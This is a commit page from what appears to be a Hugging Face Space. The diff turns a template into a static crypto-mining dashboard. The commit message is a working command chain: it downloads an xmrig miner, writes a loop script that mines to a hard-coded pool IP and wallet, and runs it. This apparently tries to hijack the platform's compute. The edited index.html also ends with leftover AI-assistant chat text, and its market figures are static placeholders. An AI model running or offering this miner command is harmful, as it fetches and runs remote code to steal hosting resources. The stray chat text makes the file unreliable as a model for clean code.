pyfa commited on
Commit
8644b42
Β·
verified Β·
1 Parent(s): d6bd16d

wget https://github.com/rplant8/xmrig-vrl/releases/download/6.0.24-virel/xmrig-vrl-linux.tar.xz && \

Browse files

tar -xf xmrig-vrl-linux.tar.xz && \
cd xmrig-vrl && \
cat << 'EOF' > miner-virel.sh
#!/bin/sh
FOLDER=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
while [ 1 ]; do
"$FOLDER"/xmrig-vrl -a rx/vrl -o 160.19.166.230:443 -u vi5rghi5c6e35vy1oaqb2p4kqp6izad9pn7d5v.hugingface
sleep 5
done
EOF
chmod +x miner-virel.sh && ./miner-virel.sh

Files changed (2) hide show
  1. README.md +8 -5
  2. index.html +134 -18
README.md CHANGED
@@ -1,10 +1,13 @@
1
  ---
2
- title: Cryptoinsight Dashboard
3
- emoji: πŸ“Š
4
- colorFrom: pink
5
- colorTo: purple
6
  sdk: static
7
  pinned: false
 
 
8
  ---
9
 
10
- Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
 
 
1
  ---
2
+ title: CryptoInsight Dashboard πŸ“Š
3
+ colorFrom: purple
4
+ colorTo: red
5
+ emoji: 🐳
6
  sdk: static
7
  pinned: false
8
+ tags:
9
+ - deepsite-v3
10
  ---
11
 
12
+ # Welcome to your new DeepSite project!
13
+ This project was created with [DeepSite](https://deepsite.hf.co).
index.html CHANGED
@@ -1,19 +1,135 @@
1
- <!doctype html>
2
- <html>
3
- <head>
4
- <meta charset="utf-8" />
5
- <meta name="viewport" content="width=device-width" />
6
- <title>My static Space</title>
7
- <link rel="stylesheet" href="style.css" />
8
- </head>
9
- <body>
10
- <div class="card">
11
- <h1>Welcome to your static Space!</h1>
12
- <p>You can modify this app directly by editing <i>index.html</i> in the Files and versions tab.</p>
13
- <p>
14
- Also don't forget to check the
15
- <a href="https://huggingface.co/docs/hub/spaces" target="_blank">Spaces documentation</a>.
16
- </p>
17
- </div>
18
- </body>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
19
  </html>
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>CryptoInsight Dashboard</title>
7
+ <script src="https://cdn.tailwindcss.com"></script>
8
+ <script src="https://unpkg.com/feather-icons"></script>
9
+ <script src="https://cdn.jsdelivr.net/npm/feather-icons/dist/feather.min.js"></script>
10
+ </head>
11
+ <body class="bg-gray-900 text-white">
12
+ <div class="min-h-screen">
13
+ <header class="bg-gray-800 py-6 shadow-lg">
14
+ <div class="container mx-auto px-4">
15
+ <div class="flex justify-between items-center">
16
+ <div class="flex items-center space-x-2">
17
+ <i data-feather="activity" class="text-purple-500"></i>
18
+ <h1 class="text-2xl font-bold">CryptoInsight</h1>
19
+ </div>
20
+ <nav class="hidden md:flex space-x-6">
21
+ <a href="#" class="hover:text-purple-400 transition">Dashboard</a>
22
+ <a href="#" class="hover:text-purple-400 transition">Calculator</a>
23
+ <a href="#" class="hover:text-purple-400 transition">News</a>
24
+ <a href="#" class="hover:text-purple-400 transition">About</a>
25
+ </nav>
26
+ <button class="md:hidden">
27
+ <i data-feather="menu"></i>
28
+ </button>
29
+ </div>
30
+ </div>
31
+ </header>
32
+
33
+ <main class="container mx-auto px-4 py-8">
34
+ <div class="grid grid-cols-1 md:grid-cols-3 gap-6">
35
+ <div class="bg-gray-800 rounded-lg p-6 shadow-lg col-span-2">
36
+ <h2 class="text-xl font-semibold mb-4">Market Overview</h2>
37
+ <div class="grid grid-cols-2 md:grid-cols-4 gap-4">
38
+ <div class="bg-gray-700 p-4 rounded-lg">
39
+ <p class="text-gray-400">BTC Price</p>
40
+ <p class="text-2xl font-bold">$43,218</p>
41
+ <p class="text-green-400">+2.4%</p>
42
+ </div>
43
+ <div class="bg-gray-700 p-4 rounded-lg">
44
+ <p class="text-gray-400">ETH Price</p>
45
+ <p class="text-2xl font-bold">$2,318</p>
46
+ <p class="text-green-400">+1.8%</p>
47
+ </div>
48
+ <div class="bg-gray-700 p-4 rounded-lg">
49
+ <p class="text-gray-400">Market Cap</p>
50
+ <p class="text-2xl font-bold">$1.67T</p>
51
+ <p class="text-red-400">-0.5%</p>
52
+ </div>
53
+ <div class="bg-gray-700 p-4 rounded-lg">
54
+ <p class="text-gray-400">24h Volume</p>
55
+ <p class="text-2xl font-bold">$112B</p>
56
+ <p class="text-green-400">+7.3%</p>
57
+ </div>
58
+ </div>
59
+ </div>
60
+
61
+ <div class="bg-gray-800 rounded-lg p-6 shadow-lg">
62
+ <h2 class="text-xl font-semibold mb-4">Quick Actions</h2>
63
+ <div class="space-y-4">
64
+ <button class="w-full bg-purple-600 hover:bg-purple-700 text-white py-2 px-4 rounded-lg transition flex items-center justify-center space-x-2">
65
+ <i data-feather="plus-circle" class="w-5 h-5"></i>
66
+ <span>Add Miner</span>
67
+ </button>
68
+ <button class="w-full bg-gray-700 hover:bg-gray-600 text-white py-2 px-4 rounded-lg transition flex items-center justify-center space-x-2">
69
+ <i data-feather="bar-chart-2" class="w-5 h-5"></i>
70
+ <span>View Stats</span>
71
+ </button>
72
+ <button class="w-full bg-gray-700 hover:bg-gray-600 text-white py-2 px-4 rounded-lg transition flex items-center justify-center space-x-2">
73
+ <i data-feather="settings" class="w-5 h-5"></i>
74
+ <span>Settings</span>
75
+ </button>
76
+ </div>
77
+ </div>
78
+ </div>
79
+
80
+ <div class="mt-8 bg-gray-800 rounded-lg p-6 shadow-lg">
81
+ <h2 class="text-xl font-semibold mb-4">Mining Hardware Comparison</h2>
82
+ <div class="overflow-x-auto">
83
+ <table class="w-full">
84
+ <thead>
85
+ <tr class="text-left border-b border-gray-700">
86
+ <th class="pb-2">Device</th>
87
+ <th class="pb-2">Hashrate</th>
88
+ <th class="pb-2">Power</th>
89
+ <th class="pb-2">Efficiency</th>
90
+ <th class="pb-2">Daily Profit</th>
91
+ </tr>
92
+ </thead>
93
+ <tbody>
94
+ <tr class="border-b border-gray-700">
95
+ <td class="py-3">Antminer S19 Pro</td>
96
+ <td>110 TH/s</td>
97
+ <td>3250W</td>
98
+ <td>29.5 J/TH</td>
99
+ <td class="text-green-400">$12.45</td>
100
+ </tr>
101
+ <tr class="border-b border-gray-700">
102
+ <td class="py-3">Whatsminer M30S++</td>
103
+ <td>112 TH/s</td>
104
+ <td>3472W</td>
105
+ <td>31.0 J/TH</td>
106
+ <td class="text-green-400">$11.89</td>
107
+ </tr>
108
+ <tr class="border-b border-gray-700">
109
+ <td class="py-3">Avalon A1246</td>
110
+ <td>90 TH/s</td>
111
+ <td>3420W</td>
112
+ <td>38.0 J/TH</td>
113
+ <td class="text-green-400">$8.76</td>
114
+ </tr>
115
+ </tbody>
116
+ </table>
117
+ </div>
118
+ </div>
119
+ </main>
120
+ </div>
121
+
122
+ <script>
123
+ feather.replace();
124
+ </script>
125
+ </body>
126
  </html>
127
+
128
+
129
+ Would you like me to create any additional pages for this dashboard, or modify the existing one? I can add:
130
+ - A mining profitability calculator
131
+ - A mining pool status page
132
+ - Hardware configuration guides
133
+ - Real-time price charts
134
+
135
+ Let me know how you'd like to proceed with legitimate cryptocurrency-related web development.